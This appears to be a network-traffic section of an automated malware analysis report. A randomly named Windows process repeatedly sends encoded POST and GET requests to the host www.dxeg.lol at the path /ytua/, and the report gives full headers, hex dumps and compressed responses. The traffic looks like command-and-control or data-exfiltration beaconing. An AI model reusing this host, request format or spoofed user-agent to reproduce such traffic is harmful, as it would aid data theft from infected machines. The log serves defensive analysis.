                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              50192.168.11.2049780137.175.33.56804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:11.597064972 CEST795OUTPOST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2b 68 32 6e 42 6f 59 37 57 76 52 6d 56 67 50 6d 44 53 61 44 49 34 72 32 35 71 59 33 75 6d 42 43 35 70 35 6c 6f 32 47 62 30 54 42 71 68 44 71 49 7a 57 64 6b 69 6e 62 71 75 42 7a 66 4f 56 53 68 6c 2b 58 54 35 79 47 48 63 63 73 4f 32 44 4e 46 54 59 44 4a 6f 32 79 52 66 51 53 59 32 56 74 74 33 78 30 73 37 68 79 37 70 36 30 38 2f 38 6f 46 79 56 4d 48 59 68 68 43 55 2f 4a 54 2b 4c 76 55 33 4e 2b 32 5a 5a 6c 4f 63 68 4f 55 74 35 67 65 62 73 58 42 56 66 66 74 69 30 6f 47 6a 55 58 6b 2f 4e 55 63 4f 75 4e 39 42 78 57 42 7a 46 77 41 57 6c 37 48 4e 77 3d 3d
                                                                                                                                              Data Ascii: oz=TGAqx/BgoJtw+h2nBoY7WvRmVgPmDSaDI4r25qY3umBC5p5lo2Gb0TBqhDqIzWdkinbquBzfOVShl+XT5yGHccsO2DNFTYDJo2yRfQSY2Vtt3x0s7hy7p608/8oFyVMHYhhCU/JT+LvU3N+2ZZlOchOUt5gebsXBVffti0oGjUXk/NUcOuN9BxWBzFwAWl7HNw==
                                                                                                                                              Oct 4, 2024 08:10:11.751032114 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:11 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: W/"66fec433-4a47"
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 30 64 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c d9 72 db c8 15 7d 9f bf 48 aa 54 35 79 80 88 ad b1 54 52 a9 e2 c8 b2 ad 44 96 5c b2 3c cb 13 0b 4b 43 84 44 12 34 08 8a a2 1e f2 ed 39 e7 36 b8 48 a4 68 8e 67 46 51 65 54 e3 81 c0 46 e3 f6 82 73 f7 ee fe c7 24 ab cb 71 f3 cf ef fe f1 17 cb fa 2e af b2 e9 50 8f 9a c3 59 5d 36 fa fb e9 48 4f b2 64 ac bf ff eb c1 b4 d0 45 71 e0 1d 1d b8 ce 9b f3 a3 cb 5f 3e 1e 1f b8 76 bf 19 0e 0e bc 63 14 cb 9d 6b 0f 92 d1 d5 81 f7 e6 c0 75 ef fb d6 d1 19 fe b6 8f 75 92 9b bb a6 6c 06 9a b7 53 15 bb e1 c1 34 ca 02 07 d7 38 0b 0e a6 71 14 3b bd fc ce 75 0f ef e6 f7 a8 10 e4 1a d7 34 c5 23 95 16 19 aa b9 6e 82 c6 3a 4b 22 de d1 50 37 09 1a 1e 25 43 50 65 c3 37 7a 3e ab ea 7c c2 b6 5d 3b ab 46 0d c6 63 1e 1d 4c c3 50 e7 eb ad 1d b8 47 07 d3 c0 77 d0 4e 98 3a 0f 3a 22 8f 56 fd 42 17 5c 1b 1d f1 75 92 ca 23 e5 f8 24 95 7b f1 06 41 15 ba 11 08 ea b4 d8 78 14 47 91 8f 77 7d 3f 41 05 d7 0f 97 33 b4 31 8e 1c 53 cf 2f 53 56 a3 ad 43 09 bc dc 46 77 8a 38 c5 08 42 1b f7 81 4a [TRUNCATED]
                                                                                                                                              Data Ascii: 10df\r}HT5yTRD\<KCD496HhgFQeTFs$q.PY]6HOdEq_>vckuulS48q;u4#n:K"P7%CPe7z>|];FcLPGwN::"VB\u#${AxGw}?A31S/SVCFw8BJy{Uh[{b7_vf>wM`>'Ds?_"B|azZ[tzS6QIF6;k)S`n'@_bQr18nRUl>HMtk,8H8CVdb%Y_cRFM]_72V1p:iZ&2OsfM@s9tAH\O:eK`:M$Zit"o=M&A&CaU'|'}@x?=bN1}90$3`zh9i9y&0nVm=C9wLu=Gh=ND*yCDa|nV2 ,)G+aa!@RBwvWCVzH3kyPY=5d@B.kdT}PCSUhquv8)gK"iW=o[%rf(fy?.dz4WvLl[^2N5d$6]|`^SY>7w_l;' [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:10:11.751188040 CEST1289INData Raw: ee 61 d6 7e 47 54 2e 88 82 e1 b7 8f 6d 07 be d6 64 9b 9d 36 bd 61 b6 ec d7 c6 e8 86 bd d5 43 8a b8 35 d5 da ef 2c 34 44 52 5f 89 19 07 32 bd 14 a6 3d 74 70 2b c8 82 02 b6 2f 4c 61 18 f0 61 96 c2 7a 8e 6d 1b b0 5b 0a b2 55 27 9f 22 be 26 29 87 62
                                                                                                                                              Data Ascii: a~GT.md6aC5,4DR_2=tp+/Laazm[U'"&)bbNzEv%l;Bscl_WVZnfL7l~6*e\Y>9nnbOVeh[;Nr#s2rxP0rJsWFYxwHS}wx=ZjX+=x
                                                                                                                                              Oct 4, 2024 08:10:11.751399040 CEST1289INData Raw: 8b 68 82 d2 2a c2 22 35 c8 27 2a 67 12 94 46 a5 89 42 3a 20 1e 8e 84 90 14 2c 4d c8 4c c7 24 32 d8 d5 b6 be c7 38 a9 2a 62 b6 eb 64 a0 00 6d 8d 0e b7 4f 35 83 50 48 7c 70 80 99 8d 2b e5 1f eb 47 42 9f 3d 81 d7 f4 aa c5 c1 4a 2f 25 48 be 33 3a fe
                                                                                                                                              Data Ascii: h*"5'*gFB: ,ML$28*bdmO5PH|p+GB=J/%H3:|5MkEfmb(<yFZqs:Q0 yemf8qGz@Gtj0"3QV=\;BT"&c7&'(#9fPQRSSw9jb73
                                                                                                                                              Oct 4, 2024 08:10:11.751481056 CEST726INData Raw: f3 4b dc ff 40 54 a2 b1 cb 8b 13 04 30 8e f1 98 fb da 8f 4e 2e 8e 3e 9f 82 5c fb fb d3 f9 69 7b f7 fe e4 62 51 f8 ee e4 c7 63 1c 2d c1 fa a7 c7 67 20 76 f4 e9 fd f9 4f 6d c9 c7 d3 ee 2f ac 68 9f 73 00 1f 2f ce ff 75 7c 24 e4 ec cb 73 5c 38 90 8f
                                                                                                                                              Data Ascii: K@T0N.>\i{bQc-g vOm/hs/u|$s\8Q|FyMw/>Y[p<R"~IhMG9x$i*DpRyDl[X}$~]TC'FrH\'*d9MAB


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              51192.168.11.2049781137.175.33.56804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:14.291415930 CEST815OUTPOST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 56 43 36 49 70 6c 72 30 69 62 7a 54 42 71 35 7a 71 4e 39 32 64 7a 69 6e 65 66 75 45 4c 66 4f 55 79 68 6c 38 66 54 34 46 61 47 61 4d 73 4d 39 6a 4e 48 4f 49 44 4a 6f 32 79 52 66 54 75 2b 32 55 4a 74 32 42 45 73 70 41 79 34 6e 61 31 4f 76 73 6f 46 6c 46 4d 44 59 68 68 77 55 37 4a 31 2b 4f 72 55 33 4a 32 32 61 49 6c 4e 57 68 50 66 6a 5a 68 47 54 74 36 46 4f 2b 4c 6c 72 6e 4e 59 68 52 48 5a 36 62 46 47 54 63 35 5a 43 69 4b 7a 33 31 4a 6f 55 6e 36 63 51 30 61 44 2f 30 43 45 4d 36 62 4d 4c 38 4b 2f 4d 79 69 7a 53 37 6f 3d
                                                                                                                                              Data Ascii: oz=TGAqx/BgoJtw/BmnHJY7D/RlbAPmNCaHI4n25rcntUVC6Iplr0ibzTBq5zqN92dzinefuELfOUyhl8fT4FaGaMsM9jNHOIDJo2yRfTu+2UJt2BEspAy4na1OvsoFlFMDYhhwU7J1+OrU3J22aIlNWhPfjZhGTt6FO+LlrnNYhRHZ6bFGTc5ZCiKz31JoUn6cQ0aD/0CEM6bML8K/MyizS7o=
                                                                                                                                              Oct 4, 2024 08:10:14.444969893 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:14 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: W/"66fec433-4a47"
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 30 64 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c d9 72 db c8 15 7d 9f bf 48 aa 54 35 79 80 88 ad b1 54 52 a9 e2 c8 b2 ad 44 96 5c b2 3c cb 13 0b 4b 43 84 44 12 34 08 8a a2 1e f2 ed 39 e7 36 b8 48 a4 68 8e 67 46 51 65 54 e3 81 c0 46 e3 f6 82 73 f7 ee fe c7 24 ab cb 71 f3 cf ef fe f1 17 cb fa 2e af b2 e9 50 8f 9a c3 59 5d 36 fa fb e9 48 4f b2 64 ac bf ff eb c1 b4 d0 45 71 e0 1d 1d b8 ce 9b f3 a3 cb 5f 3e 1e 1f b8 76 bf 19 0e 0e bc 63 14 cb 9d 6b 0f 92 d1 d5 81 f7 e6 c0 75 ef fb d6 d1 19 fe b6 8f 75 92 9b bb a6 6c 06 9a b7 53 15 bb e1 c1 34 ca 02 07 d7 38 0b 0e a6 71 14 3b bd fc ce 75 0f ef e6 f7 a8 10 e4 1a d7 34 c5 23 95 16 19 aa b9 6e 82 c6 3a 4b 22 de d1 50 37 09 1a 1e 25 43 50 65 c3 37 7a 3e ab ea 7c c2 b6 5d 3b ab 46 0d c6 63 1e 1d 4c c3 50 e7 eb ad 1d b8 47 07 d3 c0 77 d0 4e 98 3a 0f 3a 22 8f 56 fd 42 17 5c 1b 1d f1 75 92 ca 23 e5 f8 24 95 7b f1 06 41 15 ba 11 08 ea b4 d8 78 14 47 91 8f 77 7d 3f 41 05 d7 0f 97 33 b4 31 8e 1c 53 cf 2f 53 56 a3 ad 43 09 bc dc 46 77 8a 38 c5 08 42 1b f7 81 4a [TRUNCATED]
                                                                                                                                              Data Ascii: 10df\r}HT5yTRD\<KCD496HhgFQeTFs$q.PY]6HOdEq_>vckuulS48q;u4#n:K"P7%CPe7z>|];FcLPGwN::"VB\u#${AxGw}?A31S/SVCFw8BJy{Uh[{b7_vf>wM`>'Ds?_"B|azZ[tzS6QIF6;k)S`n'@_bQr18nRUl>HMtk,8H8CVdb%Y_cRFM]_72V1p:iZ&2OsfM@s9tAH\O:eK`:M$Zit"o=M&A&CaU'|'}@x?=bN1}90$3`zh9i9y&0nVm=C9wLu=Gh=ND*yCDa|nV2 ,)G+aa!@RBwvWCVzH3kyPY=5d@B.kdT}PCSUhquv8)gK"iW=o[%rf(fy?.dz4WvLl[^2N5d$6]|`^SY>7w_l;' [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:10:14.445086956 CEST1289INData Raw: ee 61 d6 7e 47 54 2e 88 82 e1 b7 8f 6d 07 be d6 64 9b 9d 36 bd 61 b6 ec d7 c6 e8 86 bd d5 43 8a b8 35 d5 da ef 2c 34 44 52 5f 89 19 07 32 bd 14 a6 3d 74 70 2b c8 82 02 b6 2f 4c 61 18 f0 61 96 c2 7a 8e 6d 1b b0 5b 0a b2 55 27 9f 22 be 26 29 87 62
                                                                                                                                              Data Ascii: a~GT.md6aC5,4DR_2=tp+/Laazm[U'"&)bbNzEv%l;Bscl_WVZnfL7l~6*e\Y>9nnbOVeh[;Nr#s2rxP0rJsWFYxwHS}wx=ZjX+=x
                                                                                                                                              Oct 4, 2024 08:10:14.445208073 CEST1289INData Raw: 8b 68 82 d2 2a c2 22 35 c8 27 2a 67 12 94 46 a5 89 42 3a 20 1e 8e 84 90 14 2c 4d c8 4c c7 24 32 d8 d5 b6 be c7 38 a9 2a 62 b6 eb 64 a0 00 6d 8d 0e b7 4f 35 83 50 48 7c 70 80 99 8d 2b e5 1f eb 47 42 9f 3d 81 d7 f4 aa c5 c1 4a 2f 25 48 be 33 3a fe
                                                                                                                                              Data Ascii: h*"5'*gFB: ,ML$28*bdmO5PH|p+GB=J/%H3:|5MkEfmb(<yFZqs:Q0 yemf8qGz@Gtj0"3QV=\;BT"&c7&'(#9fPQRSSw9jb73
                                                                                                                                              Oct 4, 2024 08:10:14.445267916 CEST726INData Raw: f3 4b dc ff 40 54 a2 b1 cb 8b 13 04 30 8e f1 98 fb da 8f 4e 2e 8e 3e 9f 82 5c fb fb d3 f9 69 7b f7 fe e4 62 51 f8 ee e4 c7 63 1c 2d c1 fa a7 c7 67 20 76 f4 e9 fd f9 4f 6d c9 c7 d3 ee 2f ac 68 9f 73 00 1f 2f ce ff 75 7c 24 e4 ec cb 73 5c 38 90 8f
                                                                                                                                              Data Ascii: K@T0N.>\i{bQc-g vOm/hs/u|$s\8Q|FyMw/>Y[p<R"~IhMG9x$i*DpRyDl[X}$~]TC'FrH\'*d9MAB


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              52192.168.11.2049782137.175.33.56804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:16.978709936 CEST2578OUTPOST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 4e 43 35 2f 70 6c 72 56 69 62 79 54 42 71 30 54 71 4d 39 32 64 79 69 6e 6d 54 75 45 50 68 4f 52 32 68 6c 5a 54 54 70 41 75 47 54 4d 73 4d 79 44 4e 47 54 59 44 63 6f 32 69 56 66 54 2b 2b 32 55 4a 74 32 44 63 73 2f 68 79 34 6c 61 30 38 2f 38 6f 43 79 56 4d 37 59 68 34 46 55 37 4e 44 2f 36 66 55 33 70 6d 32 4b 71 39 4e 61 68 50 64 7a 4a 68 56 54 74 32 4b 4f 2f 6e 66 72 69 77 31 68 57 62 5a 36 65 67 6a 4c 66 31 36 64 54 61 57 2b 55 35 4e 54 46 4c 50 59 44 71 72 7a 6c 71 76 50 4f 58 6b 56 74 75 71 59 67 53 41 50 4d 52 47 41 41 63 6d 39 61 56 63 51 73 59 63 32 67 34 57 64 7a 59 65 48 50 4b 56 46 74 34 34 62 4f 41 30 75 2b 39 46 42 35 34 63 54 64 4a 39 6a 6d 5a 4e 48 33 61 62 69 31 42 30 70 48 76 49 63 35 32 5a 71 70 6e 6c 4a 57 4b 2b 49 75 77 35 2b 33 49 62 47 68 64 44 55 70 41 49 37 7a 72 41 70 78 43 4c 6e 72 49 52 63 32 4d 45 71 4f 46 38 6e 47 44 50 31 78 56 35 78 6b 61 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=TGAqx/BgoJtw/BmnHJY7D/RlbAPmNCaHI4n25rcntUNC5/plrVibyTBq0TqM92dyinmTuEPhOR2hlZTTpAuGTMsMyDNGTYDco2iVfT++2UJt2Dcs/hy4la08/8oCyVM7Yh4FU7ND/6fU3pm2Kq9NahPdzJhVTt2KO/nfriw1hWbZ6egjLf16dTaW+U5NTFLPYDqrzlqvPOXkVtuqYgSAPMRGAAcm9aVcQsYc2g4WdzYeHPKVFt44bOA0u+9FB54cTdJ9jmZNH3abi1B0pHvIc52ZqpnlJWK+Iuw5+3IbGhdDUpAI7zrApxCLnrIRc2MEqOF8nGDP1xV5xka9w39kBVoi4BQID9xVjbZlNJ7HVwXGI+vfFIkBSExBcxhykc6Hkzce8pDIW0alBFJLD5Hhe9mDy8/iwMmfwpseqhByHJ0sIewrwvu1/XPJLSZD6MUlOW8i9/I572YhZVj0jO2NNSAlRpMds198kjLftwmgAKEsPkhCiQz2OOHMMOWZG3BHZeR/84UJdCiGD6wAzd8CxedAuz+BMDupHvNah8lxwESDwijWqCMUKG+pKNlHPtsgCafOgde0IBZBtcOz9VJ0WnHmM307AwPBW/vGEYm6+Tyq7X9vDOD7WZNVWIFMDDH9wfUdRG9oTjWSFWDVnk5m6V/w2HeQkYAFgDWYcGHKPsfUfMB7M3d4FK2qBsDX5cPxBChUAz6HfTjL5aI9CrJdii9XaB9owhImxrI7Nhjz8HjOEbqbRkA4LZJKlXEfFBcnZB6cqDkCLBjxcKGMHy4HqqzTKO1kNQhZ+o7jELIL+AtN8Umhr/foeAymvxJflHFx/tH7r5JxLUiCSPlyo8TKEjEY/NJas3l+QaJL3EFL4WtBY20o4eS7CG0IAE0Yv28kgGM9vagflsvwhVPxM95cTfddZBoJb7MH6aVMInxHDZygmal8zr/KxM0AAg9ycaLtKHhA7ZMonJbMMh2gj0FwQEkcKYGsTMZrahApfwtYqH18lJ25U [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:10:16.978745937 CEST5386OUTData Raw: 75 30 59 50 46 79 54 51 30 6d 77 4b 6b 55 44 4d 36 31 66 57 56 46 61 6a 5a 50 58 6f 6b 43 6e 4e 76 65 79 7a 44 50 36 47 64 44 42 66 4a 68 57 70 6b 4e 4b 76 49 78 34 67 6d 45 34 6e 39 35 4a 42 44 2b 33 75 6c 34 54 71 74 39 78 68 73 47 74 42 76 46
                                                                                                                                              Data Ascii: u0YPFyTQ0mwKkUDM61fWVFajZPXokCnNveyzDP6GdDBfJhWpkNKvIx4gmE4n95JBD+3ul4Tqt9xhsGtBvFSeWc2K/hGVNEeTHcJUiuulmLpGzRjK7zezg/57TxD+akgirwrCy96GmMcho77/suYzkz08TOsOhr0yLOQzs+YxyYKKEsnsTJqzF28KCS3F/E5qxDTquJoS6VSAJBgGvOLQqF5Ew6RS1QJNURM/DUmGqkqo41xWj8K
                                                                                                                                              Oct 4, 2024 08:10:17.133213043 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:17 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: W/"66fec433-4a47"
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 31 30 64 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c d9 72 db c8 15 7d 9f bf 48 aa 54 35 79 80 88 ad b1 54 52 a9 e2 c8 b2 ad 44 96 5c b2 3c cb 13 0b 4b 43 84 44 12 34 08 8a a2 1e f2 ed 39 e7 36 b8 48 a4 68 8e 67 46 51 65 54 e3 81 c0 46 e3 f6 82 73 f7 ee fe c7 24 ab cb 71 f3 cf ef fe f1 17 cb fa 2e af b2 e9 50 8f 9a c3 59 5d 36 fa fb e9 48 4f b2 64 ac bf ff eb c1 b4 d0 45 71 e0 1d 1d b8 ce 9b f3 a3 cb 5f 3e 1e 1f b8 76 bf 19 0e 0e bc 63 14 cb 9d 6b 0f 92 d1 d5 81 f7 e6 c0 75 ef fb d6 d1 19 fe b6 8f 75 92 9b bb a6 6c 06 9a b7 53 15 bb e1 c1 34 ca 02 07 d7 38 0b 0e a6 71 14 3b bd fc ce 75 0f ef e6 f7 a8 10 e4 1a d7 34 c5 23 95 16 19 aa b9 6e 82 c6 3a 4b 22 de d1 50 37 09 1a 1e 25 43 50 65 c3 37 7a 3e ab ea 7c c2 b6 5d 3b ab 46 0d c6 63 1e 1d 4c c3 50 e7 eb ad 1d b8 47 07 d3 c0 77 d0 4e 98 3a 0f 3a 22 8f 56 fd 42 17 5c 1b 1d f1 75 92 ca 23 e5 f8 24 95 7b f1 06 41 15 ba 11 08 ea b4 d8 78 14 47 91 8f 77 7d 3f 41 05 d7 0f 97 33 b4 31 8e 1c 53 cf 2f 53 56 a3 ad 43 09 bc dc 46 77 8a 38 c5 08 42 1b f7 81 4a [TRUNCATED]
                                                                                                                                              Data Ascii: 10df\r}HT5yTRD\<KCD496HhgFQeTFs$q.PY]6HOdEq_>vckuulS48q;u4#n:K"P7%CPe7z>|];FcLPGwN::"VB\u#${AxGw}?A31S/SVCFw8BJy{Uh[{b7_vf>wM`>'Ds?_"B|azZ[tzS6QIF6;k)S`n'@_bQr18nRUl>HMtk,8H8CVdb%Y_cRFM]_72V1p:iZ&2OsfM@s9tAH\O:eK`:M$Zit"o=M&A&CaU'|'}@x?=bN1}90$3`zh9i9y&0nVm=C9wLu=Gh=ND*yCDa|nV2 ,)G+aa!@RBwvWCVzH3kyPY=5d@B.kdT}PCSUhquv8)gK"iW=o[%rf(fy?.dz4WvLl[^2N5d$6]|`^SY>7w_l;' [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:10:17.133332014 CEST1289INData Raw: ee 61 d6 7e 47 54 2e 88 82 e1 b7 8f 6d 07 be d6 64 9b 9d 36 bd 61 b6 ec d7 c6 e8 86 bd d5 43 8a b8 35 d5 da ef 2c 34 44 52 5f 89 19 07 32 bd 14 a6 3d 74 70 2b c8 82 02 b6 2f 4c 61 18 f0 61 96 c2 7a 8e 6d 1b b0 5b 0a b2 55 27 9f 22 be 26 29 87 62
                                                                                                                                              Data Ascii: a~GT.md6aC5,4DR_2=tp+/Laazm[U'"&)bbNzEv%l;Bscl_WVZnfL7l~6*e\Y>9nnbOVeh[;Nr#s2rxP0rJsWFYxwHS}wx=ZjX+=x
                                                                                                                                              Oct 4, 2024 08:10:17.133799076 CEST1289INData Raw: 8b 68 82 d2 2a c2 22 35 c8 27 2a 67 12 94 46 a5 89 42 3a 20 1e 8e 84 90 14 2c 4d c8 4c c7 24 32 d8 d5 b6 be c7 38 a9 2a 62 b6 eb 64 a0 00 6d 8d 0e b7 4f 35 83 50 48 7c 70 80 99 8d 2b e5 1f eb 47 42 9f 3d 81 d7 f4 aa c5 c1 4a 2f 25 48 be 33 3a fe
                                                                                                                                              Data Ascii: h*"5'*gFB: ,ML$28*bdmO5PH|p+GB=J/%H3:|5MkEfmb(<yFZqs:Q0 yemf8qGz@Gtj0"3QV=\;BT"&c7&'(#9fPQRSSw9jb73
                                                                                                                                              Oct 4, 2024 08:10:17.133884907 CEST726INData Raw: f3 4b dc ff 40 54 a2 b1 cb 8b 13 04 30 8e f1 98 fb da 8f 4e 2e 8e 3e 9f 82 5c fb fb d3 f9 69 7b f7 fe e4 62 51 f8 ee e4 c7 63 1c 2d c1 fa a7 c7 67 20 76 f4 e9 fd f9 4f 6d c9 c7 d3 ee 2f ac 68 9f 73 00 1f 2f ce ff 75 7c 24 e4 ec cb 73 5c 38 90 8f
                                                                                                                                              Data Ascii: K@T0N.>\i{bQc-g vOm/hs/u|$s\8Q|FyMw/>Y[p<R"~IhMG9x$i*DpRyDl[X}$~]TC'FrH\'*d9MAB


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              53192.168.11.2049783137.175.33.56804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:19.663079977 CEST543OUTGET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
